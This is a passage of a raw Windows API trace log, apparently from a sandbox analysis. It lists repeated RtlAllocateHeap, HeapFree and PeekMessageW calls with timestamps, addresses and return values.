Flags=0x0, Size=0x10) returned 0xcf9ac0 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.105] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ac0 | out: hHeap=0xbe0000) returned 1 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03610 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ac0 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9dc0 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda50a8 [0248.105] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9dc0 | out: hHeap=0xbe0000) returned 1 [0248.105] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda50a8 | out: hHeap=0xbe0000) returned 1 [0248.105] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03638 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9dc0 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda50a8 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa600 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bf8 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda50b8 [0248.106] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bf8 | out: hHeap=0xbe0000) returned 1 [0248.106] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda50b8 | out: hHeap=0xbe0000) returned 1 [0248.106] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03660 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bf8 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda50b8 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e08 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa618 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda50c8 [0248.106] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa618 | out: hHeap=0xbe0000) returned 1 [0248.106] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda50c8 | out: hHeap=0xbe0000) returned 1 [0248.106] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03688 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa618 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda50c8 [0248.106] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa618 | out: hHeap=0xbe0000) returned 1 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe036b0 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa618 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b20 [0248.106] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda50d8 [0248.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b20 | out: hHeap=0xbe0000) returned 1 [0248.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda50d8 | out: hHeap=0xbe0000) returned 1 [0248.107] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe036d8 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b20 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda50d8 [0248.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b20 | out: hHeap=0xbe0000) returned 1 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03700 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b20 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6f0 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda50e8 [0248.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6f0 | out: hHeap=0xbe0000) returned 1 [0248.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda50e8 | out: hHeap=0xbe0000) returned 1 [0248.107] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03728 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6f0 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda50e8 [0248.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6f0 | out: hHeap=0xbe0000) returned 1 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03750 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6f0 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0248.107] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda50f8 [0248.107] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0248.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda50f8 | out: hHeap=0xbe0000) returned 1 [0248.108] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03778 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda50f8 [0248.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe57790 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5108 [0248.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0248.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5108 | out: hHeap=0xbe0000) returned 1 [0248.108] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe037a0 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5108 [0248.108] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa090 | out: hHeap=0xbe0000) returned 1 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe037c8 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0248.108] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5118 [0248.109] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0248.109] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5118 | out: hHeap=0xbe0000) returned 1 [0248.109] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe037f0 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5118 [0248.109] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe577c8 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c40 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5128 [0248.109] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c40 | out: hHeap=0xbe0000) returned 1 [0248.109] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5128 | out: hHeap=0xbe0000) returned 1 [0248.109] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03818 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c40 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5128 [0248.109] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c40 | out: hHeap=0xbe0000) returned 1 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03840 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9c40 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa648 [0248.109] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5138 [0248.110] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa648 | out: hHeap=0xbe0000) returned 1 [0248.110] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5138 | out: hHeap=0xbe0000) returned 1 [0248.110] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03868 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa648 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5138 [0248.110] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa648 | out: hHeap=0xbe0000) returned 1 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03890 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa648 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5148 [0248.110] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.110] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5148 | out: hHeap=0xbe0000) returned 1 [0248.110] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe038b8 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5148 [0248.110] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe038e0 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd991c0 [0248.110] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5158 [0248.111] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd991c0 | out: hHeap=0xbe0000) returned 1 [0248.111] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5158 | out: hHeap=0xbe0000) returned 1 [0248.111] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03908 [0248.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd991c0 [0248.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5158 [0248.111] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd991c0 | out: hHeap=0xbe0000) returned 1 [0248.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03930 [0248.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd991c0 [0248.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd98f20 [0248.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5168 [0248.111] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd98f20 | out: hHeap=0xbe0000) returned 1 [0248.112] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5168 | out: hHeap=0xbe0000) returned 1 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.112] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03958 [0248.112] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd98f20 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.112] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.113] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.114] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.115] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.116] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.117] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, 